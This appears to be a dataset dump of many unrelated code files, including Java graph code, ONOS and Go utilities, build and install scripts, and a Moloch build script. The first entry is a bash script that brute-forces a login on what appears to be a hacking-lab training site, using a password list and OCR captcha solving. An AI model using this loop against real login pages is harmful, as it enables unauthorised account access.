text stringlengths 1 1.05M |
|---|
#! /bin/bash
for i in $(cat passwords.txt); do
curl -H "Cookie: PHPSESSID=bds5lud0ln9tghgsb2detk9na6" -s http://captcha.hacking-lab.com/captcha.php > captcha.gif
captcha=$(gocr -C "0-9" -m 130 captcha.gif -p db.pics)
temp=$(curl -s -d "formID=31503373534448&username=hacker10&website=&simple_spc=31503373534448-31503373534448&q3_requestid=0&password=$i&norobot=$captcha" \
-H "User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36" \
-H "Referer: http://captcha.hacking-lab.com/login2.php" \
-H "Cookie: PHPSESSID=bds5lud0ln9tghgsb2detk9na6" \
-H "Connection:keep-alive" \
-H "application/x-www-form-urlencoded" \
-H "Origin: http://captcha.hacking-lab.com" \
-H "Host: captcha.hacking-lab.com" \
-H "DNT: 1" \
http://captcha.hacking-lab.com/restricted2.php
)
echo "hello $temp"
if echo $temp | grep "Username is unknown or password is wrong!" >/dev/null; then
continue
elif echo $temp | grep "was not loaded" >/dev/null; then
continue
else
echo "it is" $i
break
fi
done
|
import java.util.ArrayList;
import java.util.LinkedList;
import java.util.Queue;
public class CCBFS {
private Graph G;
private int[] visited;
private int ccount = 0;
private ArrayList<Integer> order = new ArrayList<>();
public CCBFS(Graph G){
this.G = G;
visited = new int[G.V()];
for (int i = 0; i < G.V(); i++) {
visited[i] = -1;
}
for (int v = 0; v < G.V(); v++) {
if(visited[v] == -1) {
bfs(v, ccount);
ccount++;
}
}
}
private void bfs(int s, int ccid){
Queue<Integer> queue = new LinkedList<>();
queue.add(s);
visited[s] = ccid;
while(!queue.isEmpty()){
int v = queue.remove();
order.add(v);
for(int w: G.adj(v)){
if(visited[w] == -1){
queue.add(w);
visited[w] = ccid;
}
}
}
}
public ArrayList<Integer>[] components(){
ArrayList<Integer>[] res = new ArrayList[ccount];
for (int i = 0; i < ccount; i++) {
res[i] = new ArrayList<>();
}
for (int v = 0; v < G.V(); v++) {
res[visited[v]].add(v);
}
return res;
}
public boolean isConnected(int v, int w){
G.validateVertex(v);
G.validateVertex(w);
return visited[v] == visited[w];
}
public int ccount(){
return ccount;
}
public static void main(String[] args)
{
Graph g = new Graph("g.txt");
CCBFS ccbfs = new CCBFS(g);
System.out.println(ccbfs.ccount());
ArrayList<Integer>[] comp = ccbfs.components();
for (int ccid = 0; ccid < comp.length; ccid++) {
System.out.print(ccid + " : ");
for(int w: comp[ccid])
System.out.print(w + " ");
System.out.println();
}
}
}
|
/*
* Copyright 2017-present Open Networking Foundation
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.onosproject.store.primitives.impl;
import java.util.Collection;
import java.util.Map;
import java.util.Objects;
import java.util.Set;
import java.util.concurrent.CompletableFuture;
import java.util.stream.Collectors;
import org.onosproject.store.service.AsyncConsistentMap;
import org.onosproject.store.service.Versioned;
/**
* {@link org.onosproject.store.service.AsyncConsistentMap} that doesn't allow null values.
*/
public class NotNullAsyncConsistentMap<K, V> extends DelegatingAsyncConsistentMap<K, V> {
private final AsyncConsistentMap<K, V> delegateMap;
public NotNullAsyncConsistentMap(AsyncConsistentMap<K, V> delegateMap) {
super(delegateMap);
this.delegateMap = delegateMap;
}
@Override
public CompletableFuture<Boolean> containsValue(V value) {
if (value == null) {
return CompletableFuture.completedFuture(false);
}
return super.containsValue(value);
}
@Override
public CompletableFuture<Versioned<V>> get(K key) {
return super.get(key).thenApply(v -> v != null && v.value() == null ? null : v);
}
@Override
public CompletableFuture<Versioned<V>> getOrDefault(K key, V defaultValue) {
return super.getOrDefault(key, defaultValue).thenApply(v -> v != null && v.value() == null ? null : v);
}
@Override
public CompletableFuture<Versioned<V>> put(K key, V value) {
if (value == null) {
return super.remove(key);
}
return super.put(key, value);
}
@Override
public CompletableFuture<Versioned<V>> putAndGet(K key, V value) {
if (value == null) {
return super.remove(key).thenApply(v -> null);
}
return super.putAndGet(key, value);
}
@Override
public CompletableFuture<Collection<Versioned<V>>> values() {
return super.values().thenApply(value -> value.stream()
.filter(v -> v.value() != null)
.collect(Collectors.toList()));
}
@Override
public CompletableFuture<Set<Map.Entry<K, Versioned<V>>>> entrySet() {
return super.entrySet().thenApply(entries -> entries.stream()
.filter(e -> e.getValue().value() != null)
.collect(Collectors.toSet()));
}
@Override
public CompletableFuture<Versioned<V>> putIfAbsent(K key, V value) {
if (value == null) {
return super.remove(key);
}
return super.putIfAbsent(key, value);
}
@Override
public CompletableFuture<Boolean> remove(K key, V value) {
if (value == null) {
return CompletableFuture.completedFuture(false);
}
return super.remove(key, value);
}
@Override
public CompletableFuture<Boolean> remove(K key, long version) {
return super.remove(key, version);
}
@Override
public CompletableFuture<Versioned<V>> replace(K key, V value) {
if (value == null) {
return super.remove(key);
}
return super.replace(key, value);
}
@Override
public CompletableFuture<Boolean> replace(K key, V oldValue, V newValue) {
if (oldValue == null) {
return super.putIfAbsent(key, newValue).thenApply(Objects::isNull);
} else if (newValue == null) {
return super.remove(key, oldValue);
}
return super.replace(key, oldValue, newValue);
}
@Override
public CompletableFuture<Boolean> replace(K key, long oldVersion, V newValue) {
return super.replace(key, oldVersion, newValue);
}
}
|
package parser
import (
"bytes"
"excelc/errors"
"strings"
"unicode"
)
type Array struct {
typeBase
Inner IType
}
func (t *Array) Name() string {
return "array"
}
func (t *Array) Layout() string {
return "Type[]"
}
func (t *Array) Tag() byte {
return tagArray
}
func (t *Array) IsBase() bool {
return false
}
func (t *Array) BeKey() bool {
return false
}
func (t *Array) BeArr() bool {
return true
}
func (t *Array) BeEnum() bool {
return false
}
func (t *Array) Parse(sht *Sheet, s string) error {
return nil
}
func (t *Array) Value(sht *Sheet, s0 string) (interface{}, error) {
s := TrimQuote(s0, '[', ']')
if s == "" {
return []interface{}{}, nil
}
res := make([]interface{}, 0, 3)
if t.Inner.IsBase() {
for _, e := range strings.Split(s, ",") {
v, err := t.Inner.Value(sht, strings.TrimSpace(e))
if err != nil {
return nil, err
}
if err = psr.validate(t.Inner, v); err != nil {
return nil, err
}
res = append(res, v)
}
return res, nil
}
s += ","
bracket := make([]rune, 0)
express := make([]rune, 0)
for _, char := range []rune(s) {
if unicode.IsSpace(char) {
continue
}
if char == '{' || char == '[' {
bracket = append(bracket, char)
express = append(express, char)
continue
}
if char == '}' || char == ']' {
if len(bracket) == 0 {
return nil, errors.ErrBracketNotMatch(s0, char)
}
bracket = bracket[:len(bracket)-1]
express = append(express, char)
continue
}
if char == ',' && len(bracket) == 0 {
vv, err := t.Inner.Value(sht, string(express))
if err != nil {
return nil, err
}
res = append(res, vv)
express = express[:0]
continue
}
express = append(express, char)
continue
}
if len(bracket) != 0 {
return nil, errors.ErrBracketNotMatch(s, bracket[0])
}
return res, nil
}
func (t *Array) Valid() string {
return ""
}
func (t *Array) Zero() interface{} {
return []interface{}{}
}
func (t *Array) Marshal(v interface{}) ([]byte, error) {
var buf bytes.Buffer
if err := writeTag(&buf, t.Tag()); err != nil {
return nil, err
}
if err := writeTag(&buf, t.Inner.Tag()); err != nil {
return nil, err
}
if err := writeLen(&buf, len(v.([]interface{}))); err != nil {
return nil, err
}
for _, vv := range v.([]interface{}) {
tmp, err := t.Inner.Marshal(vv)
if err != nil {
return nil, err
}
if _, err = buf.Write(tmp); err != nil {
return nil, err
}
}
return buf.Bytes(), nil
}
func (t *Array) Reader() IType {
return t
}
|
#!/bin/sh
set -e
set -u
set -o pipefail
function on_error {
echo "$(realpath -mq "${0}"):$1: error: Unexpected failure"
}
trap 'on_error $LINENO' ERR
# This protects against multiple targets copying the same framework dependency at the same time. The solution
# was originally proposed here: https://lists.samba.org/archive/rsync/2008-February/020158.html
RSYNC_PROTECT_TMP_FILES=(--filter "P .*.??????")
copy_dir()
{
local source="$1"
local destination="$2"
# Use filter instead of exclude so missing patterns don't throw errors.
echo "rsync --delete -av "${RSYNC_PROTECT_TMP_FILES[@]}" --links --filter \"- CVS/\" --filter \"- .svn/\" --filter \"- .git/\" --filter \"- .hg/\" \"${source}*\" \"${destination}\""
rsync --delete -av "${RSYNC_PROTECT_TMP_FILES[@]}" --links --filter "- CVS/" --filter "- .svn/" --filter "- .git/" --filter "- .hg/" "${source}"/* "${destination}"
}
SELECT_SLICE_RETVAL=""
select_slice() {
local paths=("$@")
# Locate the correct slice of the .xcframework for the current architectures
local target_path=""
# Split archs on space so we can find a slice that has all the needed archs
local target_archs=$(echo $ARCHS | tr " " "\n")
local target_variant=""
if [[ "$PLATFORM_NAME" == *"simulator" ]]; then
target_variant="simulator"
fi
if [[ ! -z ${EFFECTIVE_PLATFORM_NAME+x} && "$EFFECTIVE_PLATFORM_NAME" == *"maccatalyst" ]]; then
target_variant="maccatalyst"
fi
for i in ${!paths[@]}; do
local matched_all_archs="1"
for target_arch in $target_archs
do
if ! [[ "${paths[$i]}" == *"$target_variant"* ]]; then
matched_all_archs="0"
break
fi
# Verifies that the path contains the variant string (simulator or maccatalyst) if the variant is set.
if [[ -z "$target_variant" && ("${paths[$i]}" == *"simulator"* || "${paths[$i]}" == *"maccatalyst"*) ]]; then
matched_all_archs="0"
break
fi
# This regex matches all possible variants of the arch in the folder name:
# Let's say the folder name is: ios-armv7_armv7s_arm64_arm64e/CoconutLib.framework
# We match the following: -armv7_, _armv7s_, _arm64_ and _arm64e/.
# If we have a specific variant: ios-i386_x86_64-simulator/CoconutLib.framework
# We match the following: -i386_ and _x86_64-
# When the .xcframework wraps a static library, the folder name does not include
# any .framework. In that case, the folder name can be: ios-arm64_armv7
# We also match _armv7$ to handle that case.
local target_arch_regex="[_\-]${target_arch}([\/_\-]|$)"
if ! [[ "${paths[$i]}" =~ $target_arch_regex ]]; then
matched_all_archs="0"
break
fi
done
if [[ "$matched_all_archs" == "1" ]]; then
# Found a matching slice
echo "Selected xcframework slice ${paths[$i]}"
SELECT_SLICE_RETVAL=${paths[$i]}
break
fi
done
}
install_xcframework() {
local basepath="$1"
local name="$2"
local package_type="$3"
local paths=("${@:4}")
# Locate the correct slice of the .xcframework for the current architectures
select_slice "${paths[@]}"
local target_path="$SELECT_SLICE_RETVAL"
if [[ -z "$target_path" ]]; then
echo "warning: [CP] Unable to find matching .xcframework slice in '${paths[@]}' for the current build architectures ($ARCHS)."
return
fi
local source="$basepath/$target_path"
local destination="${PODS_XCFRAMEWORKS_BUILD_DIR}/${name}"
if [ ! -d "$destination" ]; then
mkdir -p "$destination"
fi
copy_dir "$source/" "$destination"
echo "Copied $source to $destination"
}
install_xcframework "${PODS_ROOT}/PayUIndia-CheckoutPro/PayUCheckoutProKit/PayUCheckoutProKit.xcframework" "PayUIndia-CheckoutPro" "framework" "ios-x86_64-simulator" "ios-arm64"
|
package com.nostalgia.aws;
public class AWSConfig {
public String distributionDomain = "REDACTED.cloudfront.net";
public String keyPairId = "REDACTED";
}
|
<reponame>ruwen1984/code-of-python
x="a"
y="b"
print(x)
print(y)
print('--------')
|
<gh_stars>100-1000
/*
Copyright 2015 The Kubernetes Authors All rights reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
package benchmark
import (
"fmt"
"testing"
"time"
)
// TestSchedule100Node3KPods schedules 3k pods on 100 nodes.
func TestSchedule100Node3KPods(t *testing.T) {
schedulePods(100, 3000)
}
// TestSchedule1000Node30KPods schedules 30k pods on 1000 nodes.
func TestSchedule1000Node30KPods(t *testing.T) {
schedulePods(1000, 30000)
}
// schedulePods schedules specific number of pods on specific number of nodes.
// This is used to learn the scheduling throughput on various
// sizes of cluster and changes as more and more pods are scheduled.
// It won't stop until all pods are scheduled.
func schedulePods(numNodes, numPods int) {
schedulerConfigFactory, destroyFunc := mustSetupScheduler()
defer destroyFunc()
c := schedulerConfigFactory.Client
makeNodes(c, numNodes)
makePods(c, numPods)
prev := 0
start := time.Now()
for {
// This can potentially affect performance of scheduler, since List() is done under mutex.
// Listing 10000 pods is an expensive operation, so running it frequently may impact scheduler.
// TODO: Setup watch on apiserver and wait until all pods scheduled.
scheduled := schedulerConfigFactory.ScheduledPodLister.Store.List()
fmt.Printf("%ds\trate: %d\ttotal: %d\n", time.Since(start)/time.Second, len(scheduled)-prev, len(scheduled))
if len(scheduled) >= numPods {
return
}
prev = len(scheduled)
time.Sleep(1 * time.Second)
}
}
|
<gh_stars>0
import express from 'express';
let authRouter = express.Router();
const router = function () {
authRouter.route('/signup')
.post(function (req, res) {
console.log(req.body);
res.send('hi');
})
return authRouter;
}
module.exports = router;
|
#network interface on which to limit traffic
IF="eth0"
#limit of the network interface in question
LINKCEIL="1gbit"
#limit outbound Bitcoin protocol traffic to this rate
LIMIT="160kbit"
#defines the address space for which you wish to disable rate limiting
LOCALNET="192.168.0.0/16"
#delete existing rules
tc qdisc del dev ${IF} root
#add root class
tc qdisc add dev ${IF} root handle 1: htb default 10
#add parent class
tc class add dev ${IF} parent 1: classid 1:1 htb rate ${LINKCEIL} ceil ${LINKCEIL}
#add our two classes. one unlimited, another limited
tc class add dev ${IF} parent 1:1 classid 1:10 htb rate ${LINKCEIL} ceil ${LINKCEIL} prio 0
tc class add dev ${IF} parent 1:1 classid 1:11 htb rate ${LIMIT} ceil ${LIMIT} prio 1
#add handles to our classes so packets marked with <x> go into the class with "... handle <x> fw ..."
tc filter add dev ${IF} parent 1: protocol ip prio 1 handle 1 fw classid 1:10
tc filter add dev ${IF} parent 1: protocol ip prio 2 handle 2 fw classid 1:11
#delete any existing rules
#disable for now
#ret=0
#while [ $ret -eq 0 ]; do
# iptables -t mangle -D OUTPUT 1
# ret=$?
#done
#limit outgoing traffic to and from port 7227. but not when dealing with a host on the local network
# (defined by $LOCALNET)
# --set-mark marks packages matching these criteria with the number "2"
# these packages are filtered by the tc filter with "handle 2"
# this filter sends the packages into the 1:11 class, and this class is limited to ${LIMIT}
iptables -t mangle -A OUTPUT -p tcp -m tcp --dport 7227 ! -d ${LOCALNET} -j MARK --set-mark 0x2
iptables -t mangle -A OUTPUT -p tcp -m tcp --sport 7227 ! -d ${LOCALNET} -j MARK --set-mark 0x2
|
<filename>raigad-es-extensions/src/main/java/org/elasticsearch/discovery/custom/ElasticsearchUtil.java<gh_stars>0
/**
* Copyright 2014 Netflix, Inc.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.elasticsearch.discovery.custom;
import org.elasticsearch.common.logging.ESLogger;
import java.io.IOException;
import java.util.ArrayList;
import java.util.List;
import java.util.Map;
public class ElasticsearchUtil
{
private static final String TOP_LEVEL_ELEMENT = "instances";
private static final String HOST_NAME = "host_name";
private static final String ID = "id";
private static final String APP_NAME = "app_name";
private static final String INSTANCE_ID = "instance_id";
private static final String AVAILABILITY_ZONE = "availability_zone";
private static final String PUBLIC_IP = "public_ip";
private static final String DC = "dc";
private static final String UPDATE_TIME = "update_time";
@SuppressWarnings("unchecked")
public static List<RaigadInstance> getRaigadInstancesFromJsonString(String jsonInstances,ESLogger logger)
{
List<RaigadInstance> raigadInstances = new ArrayList<RaigadInstance>();
try {
JsonPath jsonPath = new JsonPath(jsonInstances);
Map<String,Object> topLevelInstanceMap = (Map<String, Object>) jsonPath.jsonMap.get(TOP_LEVEL_ELEMENT);
for(String instanceKey : topLevelInstanceMap.keySet())
{
Map<String,Object> instParamMap = (Map<String, Object>) topLevelInstanceMap.get(instanceKey);
RaigadInstance raigadInstance = new RaigadInstance();
raigadInstance.setApp((String) instParamMap.get(APP_NAME));
raigadInstance.setAvailabilityZone((String) instParamMap.get(AVAILABILITY_ZONE));
raigadInstance.setDC((String) instParamMap.get(DC));
raigadInstance.setHostIP((String) instParamMap.get(PUBLIC_IP));
raigadInstance.setHostName((String) instParamMap.get(HOST_NAME));
raigadInstance.setId((String) instParamMap.get(ID));
raigadInstance.setInstanceId((String) instParamMap.get(INSTANCE_ID));
raigadInstance.setUpdatetime((Long) instParamMap.get(UPDATE_TIME));
logger.info("EsInstance = ("+raigadInstance.toString()+")");
//Add to the list
raigadInstances.add(raigadInstance);
}
} catch (IOException e) {
logger.error(" Error caught during Json Parsing", e);
}
return raigadInstances;
}
}
|
from bs4 import BeautifulSoup
def extractPackages(htmlCode):
package_info = []
soup = BeautifulSoup(htmlCode, 'html.parser')
package_divs = soup.find_all('div', class_='package')
for div in package_divs:
package_title = div.find('h3', class_='package-title').text
package_color = div['class'][1] # Assuming the color class is always the second class
package_info.append((package_title, package_color))
return package_info |
<filename>scripts/add_upgrade_path.js
const HDWalletProvider = require("truffle-hdwallet-provider")
const Web3 = require('web3')
const assets = require('../assets/deployed-assets.json');
const NFT_ABI = require('../build/contracts/Galaxia.json');
require('dotenv').config({ path: '../.env' });
const MNEMONIC = process.env.MNEMONIC
const INFURA_KEY = process.env.INFURA_KEY
const NFT_CONTRACT_ADDRESS = process.env.NFT_CONTRACT_ADDRESS
const OWNER_ADDRESS = process.env.OWNER_ADDRESS
const NETWORK = process.env.NETWORK
if (!MNEMONIC || !INFURA_KEY || !OWNER_ADDRESS || !NETWORK) {
console.error("Please set a mnemonic, infura key, owner, network, and contract address.")
return
}
async function main() {
try {
const provider = new HDWalletProvider(MNEMONIC, `https://${NETWORK}.infura.io/v3/${INFURA_KEY}`)
const web3 = new Web3(provider)
if (NFT_CONTRACT_ADDRESS) {
const nftContract = new web3.eth.Contract(NFT_ABI.abi, NFT_CONTRACT_ADDRESS, { gasLimit: "1000000" });
let alreadyMinted = Number(await nftContract.methods.totalSupply().call());
for (let i = 0; i < alreadyMinted; i++) {
const nft = assets[i];
const ipfsHash = await nftContract.methods.ipfsURI(i).call();
const upgradeHash = web3.utils.soliditySha3(nft.id, nft.metadata);
const validUpgrade = await nftContract.methods.validURI(upgradeHash).call();
// Check that the metadata is different and that an upgrade path doesnt already exist
if (nft.metadata !== ipfsHash && !validUpgrade) {
console.log("asset ", nft.name , "old uri ", ipfsHash, " new uri ", nft.metadata);
const gasPrice = web3.utils.toWei('20', 'gwei');
const gas = await nftContract.methods.addUpgradePath(nft.id, nft.metadata).estimateGas({ from: OWNER_ADDRESS });
const tx = await nftContract.methods.addUpgradePath(nft.id, nft.metadata)
.send({ from: OWNER_ADDRESS, gas: (gas + 21000), gasPrice: gasPrice })
// .once('transactionHash', function (hash) {
// console.log("tx hash ", hash);
// })
// .once('receipt', function (receipt) {
// // console.log("receipt ", receipt);
// })
.on('confirmation', function (confNumber, receipt) {
if (confNumber === 3) {
console.log("nft ", nft.name, " metadata can be upgraded by owner to ", nft.metadata);
return receipt;
}
})
.on('error', function (error) {
console.log(error);
process.exit(1);
})
// .then(function (receipt) {
// // will be fired once the receipt is mined
// console.log("receipt mined ", receipt);
// return receipt;
// });
// if (tx) {
// return;
// }
} else {
console.log("nft ", nft.name, " is already up to date");
}
}
process.exit();
}
} catch (err) {
console.log(err);
process.exit(1);
}
}
main() |
cd /root/deploy_fuku/
git fetch origin
if [[ `git diff origin/master` ]]; then
echo change at $(date)
git merge origin/master
#else
#echo "No changes"
fi
|
#!/usr/bin/env bash
echo "[INFO] Setting up project please be patient..."
npm install
createdb passport
sequelize db:migrate
sequelize db:seed:all
if [[ $? -eq 0 ]]; then
echo "[INFO] Your project has been setup successfully run npm start to get started!"
else
echo "[ERROR] Your project had some issues getting setup check the log for more details."
fi
|
package tree_search;
import java.io.BufferedReader;
import java.io.InputStreamReader;
import java.util.ArrayList;
import java.util.LinkedList;
import java.util.Queue;
import java.util.StringTokenizer;
/**
*
* @author minchoba 백준 1068번: 트리
*
* @see https://www.acmicpc.net/problem/1068/
*
*/
public class Boj1068 {
private static final int IS_ROOT = 0;
private static final int INF = 51;
public static void main(String[] args) throws Exception {
// 버퍼를 통한 값 입력
BufferedReader br = new BufferedReader(new InputStreamReader(System.in));
int N = Integer.parseInt(br.readLine());
ArrayList<Integer>[] graph = new ArrayList[INF];
for (int i = 0; i < INF; i++) {
graph[i] = new ArrayList<>();
}
int root = 0;
StringTokenizer st = new StringTokenizer(br.readLine());
for (int i = 1; i < N + 1; i++) {
int tmp = Integer.parseInt(st.nextToken()) + 1; // -1 입력을 제거
graph[tmp].add(i); // 부모를 통한 자식 탐색을 위해 값을 반대로 입력
if (tmp == IS_ROOT) // 해당 순서가 루트인 경우 루트의 현재 노드를 담아줌
root = i;
}
int remove = Integer.parseInt(br.readLine()) + 1;
for (int i = 1; i < N + 1; i++) {
int size = graph[i].size();
for (int j = 0; j < size; j++) {
if (graph[i].get(j) == remove) {
graph[i].remove(j); // 조건에 해당하는 자식노드를 즉, 값을 지움
size--; // 지움으로써 줄어드는 사이즈를 변경
}
}
}
int size = graph[remove].size();
for (int i = 0; i < size; i++) { // 조건에 해당하는 부모 노드 삭제
graph[remove].remove(0);
}
System.out.println(root == remove ? 0 : search(graph, N, remove, root)); // 탐색 메소드를 통한 결과 출력, 만약 루트노드 삭제시 0 출력
}
/**
* 트리 탐색 메소드
*
*/
private static int search(ArrayList<Integer>[] tree, int N, int r, int start) {
int cnt = 0;
Queue<Integer> q = new LinkedList<>();
q.offer(start);
while (!q.isEmpty()) {
int current = q.poll();
if (tree[current].isEmpty()) { // 탐색을 하며 현재 노드에 값이 들어있지 않은 경우, 마지막 리프 노드이므로 +1
cnt++;
}
for (int next : tree[current]) {
if (next > 0 && next < N + 1 && next != r) {
q.offer(next);
}
}
}
return cnt; // 가장 끝의 리프노드 개수를 반환
}
}
|
#!/bin/bash
find -name '*.mkv' -exec mkvpropedit {} --set "title=" \;
|
<reponame>hiroqn/zbzb
var add = require('./math.js').add,
map = module.exports = function () {
return Array.prototype.slice.call(arguments).map(add);
};
console.log(map(1, 2, 3));
require('example2/example3');
var type = require('example2').type;
console.log(type(console.log)); // Function
|
<filename>node_modules/@babylonjs/gui/2D/multiLinePoint.d.ts
import { Nullable } from "@babylonjs/core/types";
import { Vector3 } from "@babylonjs/core/Maths/math.vector";
import { AbstractMesh } from "@babylonjs/core/Meshes/abstractMesh";
import { MultiLine } from "./controls/multiLine";
import { Control } from "./controls/control";
/**
* Class used to store a point for a MultiLine object.
* The point can be pure 2D coordinates, a mesh or a control
*/
export declare class MultiLinePoint {
private _multiLine;
private _x;
private _y;
private _control;
private _mesh;
private _controlObserver;
private _meshObserver;
/** @hidden */
_point: Vector3;
/**
* Creates a new MultiLinePoint
* @param multiLine defines the source MultiLine object
*/
constructor(multiLine: MultiLine);
/** Gets or sets x coordinate */
get x(): string | number;
set x(value: string | number);
/** Gets or sets y coordinate */
get y(): string | number;
set y(value: string | number);
/** Gets or sets the control associated with this point */
get control(): Nullable<Control>;
set control(value: Nullable<Control>);
/** Gets or sets the mesh associated with this point */
get mesh(): Nullable<AbstractMesh>;
set mesh(value: Nullable<AbstractMesh>);
/** Resets links */
resetLinks(): void;
/**
* Gets a translation vector with Z component
* @returns the translation vector
*/
translate(): Vector3;
private _translatePoint;
/** Release associated resources */
dispose(): void;
}
|
#!/bin/sh
# Use this script to install OS dependencies, downloading and compile moloch dependencies, compile moloch capture, optionally install
# This script will
# * use apt-get/yum to install OS dependancies
# * download known working versions of moloch dependancies
# * build them statically
# * configure moloch-capture to use them
# * build moloch-capture
# * install node unless --nonode
# * install moloch if --install
GLIB=2.54.3
YARA=3.7.1
MAXMIND=1.3.2
PCAP=1.9.0
CURL=7.59.0
LUA=5.3.4
DAQ=2.0.6
NODE=8.11.1
TDIR="/data/moloch"
DOPFRING=0
DODAQ=0
DOCLEAN=0
DONODE=1
DOINSTALL=0
while :
do
case $1 in
-p | --pf_ring | --pfring)
DOPFRING=1
shift
;;
-d | --dir)
TDIR=$2
shift 2
;;
--daq)
DODAQ=1
shift
;;
--clean)
DOCLEAN=1
shift
;;
--install)
DOINSTALL=1
shift
;;
--nonode)
DONODE=0
shift
;;
--help)
echo "Make it easier to build Moloch! This will download and build thirdparty libraries plus build Moloch."
echo "--dir <directory> = The directory to install everything into [/data/moloch]"
echo "--clean = Do a 'make clean' first"
echo "--install = Do a 'make install' at the end, adding our node to the path"
echo "--nonode = Do NOT download and install nodejs into the moloch directory"
echo "--pfring = Build pfring support"
echo "--daq = Build daq support"
exit 0;
;;
-*)
echo "Unknown option '$1', try '--help'"
exit 1
;;
*)
break
;;
esac
done
# Check the existance of sudo
command -v sudo >/dev/null 2>&1 || { echo >&2 "MOLOCH: sudo is required to be installed"; exit 1; }
MAKE=make
# Installing dependencies
echo "MOLOCH: Installing Dependencies"
if [ -f "/etc/redhat-release" ]; then
sudo yum -y install wget curl pcre pcre-devel pkgconfig flex bison gcc-c++ zlib-devel e2fsprogs-devel openssl-devel file-devel make gettext libuuid-devel perl-JSON bzip2-libs bzip2-devel perl-libwww-perl libpng-devel xz libffi-devel readline-devel libtool libyaml-devel perl-Socket6
if [ $? -ne 0 ]; then
echo "MOLOCH: yum failed"
exit 1
fi
fi
if [ -f "/etc/debian_version" ]; then
sudo apt-get -y install wget curl libpcre3-dev uuid-dev libmagic-dev pkg-config g++ flex bison zlib1g-dev libffi-dev gettext libgeoip-dev make libjson-perl libbz2-dev libwww-perl libpng-dev xz-utils libffi-dev libssl-dev libreadline-dev libtool libyaml-dev dh-autoreconf libsocket6-perl
if [ $? -ne 0 ]; then
echo "MOLOCH: apt-get failed"
exit 1
fi
fi
if [ "$(uname)" = "FreeBSD" ]; then
sudo pkg_add -Fr wget curl pcre flex bison gettext e2fsprogs-libuuid glib gmake libexecinfo
MAKE=gmake
fi
echo "MOLOCH: Downloading and building static thirdparty libraries"
if [ ! -d "thirdparty" ]; then
mkdir thirdparty
fi
cd thirdparty || exit
TPWD=`pwd`
# glib
if [ "$(uname)" = "FreeBSD" ]; then
#Screw it, use whatever the OS has
WITHGLIB=" "
else
WITHGLIB="--with-glib2=thirdparty/glib-$GLIB"
if [ ! -f "glib-$GLIB.tar.xz" ]; then
GLIBDIR=$(echo $GLIB | cut -d. -f 1-2)
wget "http://ftp.gnome.org/pub/gnome/sources/glib/$GLIBDIR/glib-$GLIB.tar.xz"
fi
if [ ! -f "glib-$GLIB/gio/.libs/libgio-2.0.a" ] || [ ! -f "glib-$GLIB/glib/.libs/libglib-2.0.a" ]; then
xzcat glib-$GLIB.tar.xz | tar xf -
(cd glib-$GLIB ; ./configure --disable-xattr --disable-shared --enable-static --disable-libelf --disable-selinux --disable-libmount --with-pcre=internal; $MAKE)
if [ $? -ne 0 ]; then
echo "MOLOCH: $MAKE failed"
exit 1
fi
else
echo "MOLOCH: Not rebuilding glib"
fi
fi
# yara
if [ ! -f "yara/yara-$YARA.tar.gz" ]; then
mkdir -p yara
wget https://github.com/VirusTotal/yara/archive/v$YARA.tar.gz -O yara/yara-$YARA.tar.gz
fi
if [ ! -f "yara/yara-$YARA/libyara/.libs/libyara.a" ]; then
(cd yara ; tar zxf yara-$YARA.tar.gz)
(cd yara/yara-$YARA; ./bootstrap.sh ; ./configure --enable-static; $MAKE)
if [ $? -ne 0 ]; then
echo "MOLOCH: $MAKE failed"
exit 1
fi
else
echo "MOLOCH: Not rebuilding yara"
fi
# Maxmind
if [ ! -f "libmaxminddb-$MAXMIND.tar.gz" ]; then
wget https://github.com/maxmind/libmaxminddb/releases/download/$MAXMIND/libmaxminddb-$MAXMIND.tar.gz
fi
if [ ! -f "libmaxminddb-$MAXMIND/src/.libs/libmaxminddb.a" ]; then
tar zxf libmaxminddb-$MAXMIND.tar.gz
(cd libmaxminddb-$MAXMIND ; ./configure --enable-static; $MAKE)
if [ $? -ne 0 ]; then
echo "MOLOCH: $MAKE failed"
exit 1
fi
else
echo "MOLOCH: Not rebuilding libmaxmind"
fi
# libpcap
if [ ! -f "libpcap-$PCAP.tar.gz" ]; then
wget http://www.tcpdump.org/release/libpcap-$PCAP.tar.gz
fi
if [ ! -f "libpcap-$PCAP/libpcap.a" ]; then
tar zxf libpcap-$PCAP.tar.gz
echo "MOLOCH: Building libpcap";
(cd libpcap-$PCAP; ./configure --disable-dbus --disable-usb --disable-canusb --disable-bluetooth --with-snf=no; $MAKE)
if [ $? -ne 0 ]; then
echo "MOLOCH: $MAKE failed"
exit 1
fi
else
echo "MOLOCH: NOT rebuilding libpcap";
fi
PCAPDIR=$TPWD/libpcap-$PCAP
PCAPBUILD="--with-libpcap=$PCAPDIR"
# curl
if [ ! -f "curl-$CURL.tar.gz" ]; then
wget http://curl.haxx.se/download/curl-$CURL.tar.gz
fi
if [ ! -f "curl-$CURL/lib/.libs/libcurl.a" ]; then
tar zxf curl-$CURL.tar.gz
( cd curl-$CURL; ./configure --disable-ldap --disable-ldaps --without-libidn2 --without-librtmp --without-libpsl --without-nghttp2 --without-nghttp2 --without-nss; $MAKE)
if [ $? -ne 0 ]; then
echo "MOLOCH: $MAKE failed"
exit 1
fi
else
echo "MOLOCH: Not rebuilding curl"
fi
# lua
if [ ! -f "lua-$LUA.tar.gz" ]; then
wget https://www.lua.org/ftp/lua-$LUA.tar.gz
fi
